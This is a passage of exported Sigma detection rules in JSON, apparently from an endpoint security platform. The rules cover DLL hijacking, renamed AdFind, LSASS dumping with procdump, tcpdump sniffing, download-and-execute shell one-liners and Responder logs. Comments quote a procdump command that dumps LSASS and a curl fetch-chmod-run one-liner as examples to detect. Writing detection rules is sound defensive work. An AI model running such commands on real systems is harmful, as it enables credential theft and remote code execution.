library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'symstore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\symsrv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Program Files (x86)\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Program Files (x86)\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n 
condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63a7d949-9fde-46be-a6fd-f97306f8447c",
"rule_name": "DLL Hijacking via symstore.exe",
"rule_description": "Detects potential Windows DLL Hijacking via symstore.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63b8bd32-635b-4502-9608-767c742d73d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084233Z",
"creation_date": "2026-03-23T11:45:34.084236Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084240Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.joeware.net/freetools/tools/adfind/",
"https://attack.mitre.org/software/S0552/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "adfind_renamed_binary.yml",
"content": "title: Renamed AdFind Binary Executed\nid: 63b8bd32-635b-4502-9608-767c742d73d3\ndescription: |\n Detects the execution of a renamed AdFind binary.\n AdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network. Sometimes, this binary is renamed to avoid detection.\n It is recommended to determine if this binary is expected to be used in your environment and check for other suspicious commands by the parent process.\nreferences:\n - http://www.joeware.net/freetools/tools/adfind/\n - https://attack.mitre.org/software/S0552/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1016/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.t1018\n - attack.t1016\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'AdFind.exe'\n\n filter_name:\n Image|endswith: '\\AdFind.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63b8bd32-635b-4502-9608-767c742d73d3",
"rule_name": "Renamed AdFind Binary Executed",
"rule_description": "Detects the execution of a renamed AdFind binary.\nAdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network. Sometimes, this binary is renamed to avoid detection.\nIt is recommended to determine if this binary is expected to be used in your environment and check for other suspicious commands by the parent process.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588350Z",
"creation_date": "2026-03-23T11:45:34.588354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588361Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/",
"https://attack.mitre.org/techniques/T1071/"
],
"name": "t1071_suspicious_network_connection_from_legitimate_process.yml",
"content": "title: Suspicious Network Activity from Legitimate Process\nid: 63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f\ndescription: |\n Detects suspicious network activity initiated by a process that should not be network-active.\n Attackers can inject code or masquerade malware as legitimate processes that will perform network connections to their C2 server.\n Processes mentioned in this rule are not known to legitimately perform network connections.\n It is recommended to analyze the process performing the network connection for possible injection, as well as to analyze the parent and child processes for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2023/02/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\ApplicationFrameHost.exe'\n - '\\audiodg.exe'\n - '\\calc.exe'\n - '\\csrss.exe'\n - '\\dwm.exe'\n - '\\fontdrvhost.exe'\n - '\\MediaAggreService.exe'\n - '\\SecurityHealthService.exe'\n - '\\SecurityHealthSystray.exe'\n - '\\SgrmBroker.exe'\n - '\\sihost.exe'\n - '\\smss.exe'\n - '\\Taskmgr.exe'\n - '\\regsvr32.exe'\n - '\\msxsl.exe'\n\n filter_linklocal_ipv6:\n SourceIp: 'fe80::*'\n DestinationIp: 'fe80::*'\n\n filter_linklocal_ipv4:\n # Ne need to check source IP when destination is a local address\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # 
RFC6598\n\n exclusion_sihost:\n ProcessImage: '?:\\Windows\\System32\\sihost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_task_manager1:\n ProcessImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessCommandLine:\n # Right click on the Taskbar and click 'Start task Manager'\n - '?:\\WINDOWS\\system32\\taskmgr.exe /4'\n # Start Menu, click ‘Task Manager’\n - '?:\\WINDOWS\\system32\\taskmgr.exe /7'\n ProcessParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_task_manager2:\n ProcessCommandLine:\n # Press CTRL+SHIFT+ESC\n - '?:\\Windows\\System32\\Taskmgr.exe /2'\n # Press CTRL+ALT+DEL, click 'Start Task Manager'\n - '?:\\WINDOWS\\System32\\Taskmgr.exe /3'\n ProcessParentImage:\n - '?:\\Windows\\System32\\LaunchTM.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_rshell:\n ProcessCommandLine: 'regsvr32.exe -s -u RShellEx.dll'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_microsoft:\n ProcessCommandLine: '?:\\Windows\\System32\\SecurityHealthService.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\services.exe'\n # graph.microsoft.com\n\n exclusion_applicationframeHost:\n ProcessImage: '?:\\Windows\\System32\\ApplicationFrameHost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f",
"rule_name": "Suspicious Network Activity from Legitimate Process",
"rule_description": "Detects suspicious network activity initiated by a process that should not be network-active.\nAttackers can inject code or masquerade malware as legitimate processes that will perform network connections to their C2 server.\nProcesses mentioned in this rule are not known to legitimately perform network connections.\nIt is recommended to analyze the process performing the network connection for possible injection, as well as to analyze the parent and child processes for malicious content or actions.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63f75270-bccf-4f9a-a525-1b0a4520eda4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619576Z",
"creation_date": "2026-03-23T11:45:34.619578Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619582Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tcpdump_macos.yml",
"content": "title: Network Sniffed via tcpdump (macOS)\nid: 63f75270-bccf-4f9a-a525-1b0a4520eda4\ndescription: |\n Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to analyze the context around the execution of tcpdump to determine whether it is the result of legitimate administrative actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tcpdump\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tcpdump'\n\n # Explicitly use an OR because parents can be empty\n exclusion_wifivelocityd:\n - ParentImage: '/usr/libexec/wifivelocityd'\n - CommandLine|startswith: '/usr/sbin/tcpdump -q -n -i en0 -G 60 -W 1 -w /var/run/com.apple.wifivelocity/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63f75270-bccf-4f9a-a525-1b0a4520eda4",
"rule_name": "Network Sniffed via tcpdump (macOS)",
"rule_description": "Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to analyze the context around the execution of tcpdump to determine whether it is the result of legitimate administrative actions.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "641d7001-4ba6-459b-80c2-175c48872aba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094976Z",
"creation_date": "2026-03-23T11:45:34.094978Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094982Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_procdump.yml",
"content": "title: Process Memory Dumped via procdump\nid: 641d7001-4ba6-459b-80c2-175c48872aba\ndescription: |\n Detects a suspicious attempt to dump a process' memory.\n This technique is often used to dump the LSASS.exe process memory.\n It is recommended to investigate the process responsible for the memory dump and check the sensitivity of the data handled by the dumped process.\n For instance, LSASS.exe contains authentication secrets used by Windows during a session. The data handled by LSASS are highly sensitive; a dump of this process must be considered critical.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/04/15\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ProcDump\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # procdump64 -accepteula -ma lsass.exe C:\\windows\\temp\\lsass.dmp\n selection_bin:\n OriginalFileName: 'procdump'\n selection_cmd:\n CommandLine|contains: ' -ma '\n\n exclusion_werfault_system32:\n - ProcessParentCommandLine|contains|all:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n - ProcessGrandparentCommandLine|contains|all:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n\n exclusion_werfault_syswow64:\n - ProcessParentCommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n - ProcessGrandparentCommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "641d7001-4ba6-459b-80c2-175c48872aba",
"rule_name": "Process Memory Dumped via procdump",
"rule_description": "Detects a suspicious attempt to dump a process' memory.\nThis technique is often used to dump the LSASS.exe process memory.\nIt is recommended to investigate the process responsible for the memory dump and check the sensitivity of the data handled by the dumped process.\nFor instance, LSASS.exe contains authentication secrets used by Windows during a session. The data handled by LSASS are highly sensitive; a dump of this process must be considered critical.\n",
"rule_creation_date": "2021-04-15",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "643a4d88-8291-484a-9e2e-40b0e9baa9c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599203Z",
"creation_date": "2026-03-23T11:45:34.599209Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599218Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wkspbroker.yml",
"content": "title: DLL Hijacking via wkspbroker.exe\nid: 643a4d88-8291-484a-9e2e-40b0e9baa9c5\ndescription: |\n Detects potential Windows DLL Hijacking via wkspbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wkspbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\DNSAPI.dll'\n - '\\ktmw32.dll'\n - '\\PROPSYS.dll'\n - '\\RADCUI.dll'\n - '\\SspiCli.dll'\n - '\\tsworkspace.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "643a4d88-8291-484a-9e2e-40b0e9baa9c5",
"rule_name": "DLL Hijacking via wkspbroker.exe",
"rule_description": "Detects potential Windows DLL hijacking via wkspbroker.exe.\nDLL hijacking abuses the default Windows DLL search order by placing a malicious DLL in the same directory as a victim application, so that it is loaded instead of the legitimate library.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content (path, signature, hash) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "646cd21f-0ab5-4c42-ace5-ba0895d6b650",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618250Z",
"creation_date": "2026-03-23T11:45:34.618253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618257Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1059_004_remote_file_execution.yml",
"content": "title: Suspicious Download and Execution of a Remote File (macOS)\nid: 646cd21f-0ab5-4c42-ace5-ba0895d6b650\ndescription: |\n Detects the download and execution of a file in a one-liner command.\n Attackers may try to download and execute a remote payload as part of their kill chain.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/10/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.FileDownload\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n # tmp=”$(mktemp /tmp/XXXXXXXX)”; curl –retry 5 -f “[url]” -o “${tmp}”; if [[ -s “${tmp}” ]]; then chmod 777 “${tmp}”; “${tmp}”; fi; rm “${tmp}”\n ProcessParentImage|endswith:\n - '/sh'\n - '/bash'\n - '/csh'\n - '/dash'\n - '/ksh'\n - '/tcsh'\n - '/zsh'\n # use regexp to eliminate multi-line script\n ProcessParentCommandLine|re:\n - '^.*(wget|curl) *.*chmod *\\+x.*$'\n - '^.*(wget|curl) *.*chmod *7\\d\\d.*$'\n\n filter_expected:\n ProcessImage|endswith:\n - '/wget'\n - '/curl'\n - '/chmod'\n - '/mkdir'\n - '/mv'\n - '/cp'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "646cd21f-0ab5-4c42-ace5-ba0895d6b650",
"rule_name": "Suspicious Download and Execution of a Remote File (macOS)",
"rule_description": "Detects a one-liner shell command that downloads a file (via curl or wget), marks it executable with chmod, and runs it.\nAttackers may download and execute a remote payload this way as part of their kill chain.\nIt is recommended to review the full command line for the download URL and target path, and to check the process that launched the command and any child processes it spawned for malicious behavior.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-01-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "647306ca-bd03-4108-ac71-b90bb1bb95fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612711Z",
"creation_date": "2026-03-23T11:45:34.612714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612722Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SpiderLabs/Responder",
"https://github.com/lgandx/Responder",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_log_file_responder.yml",
"content": "title: Log Files Related to Responder Written\nid: 647306ca-bd03-4108-ac71-b90bb1bb95fd\ndescription: |\n Detects file writes on default Responder file logs.\n Responder is an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for privilege escalation, credential access and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.Filesystem\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path|endswith:\n - '/logs/Poisoners-Session.log'\n - '/logs/Responder-Session.log'\n - '/logs/SMB-NTLMv2-SSP-*.txt'\n - '/logs/SMB-NTLMv2-Client-*.txt'\n - '/logs/SMB-NTLMSSPv2-Client-*.txt'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "647306ca-bd03-4108-ac71-b90bb1bb95fd",
"rule_name": "Log Files Related to Responder Written",
"rule_description": "Detects writes to the default log files created by Responder (Responder-Session.log, Poisoners-Session.log and the captured SMB NTLMv2 hash files under logs/).\nResponder is an open-source tool that poisons LLMNR, NBT-NS and mDNS name resolution and answers selected queries in order to capture credentials, primarily from SMB clients.\nAttackers can use the captured NTLMv2 hashes (for example by cracking them offline) for credential access, privilege escalation and lateral movement.\nIt is recommended to verify whether the tool is run as part of an authorized engagement; if not, treat any accounts whose hashes appear in the captured files as compromised.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
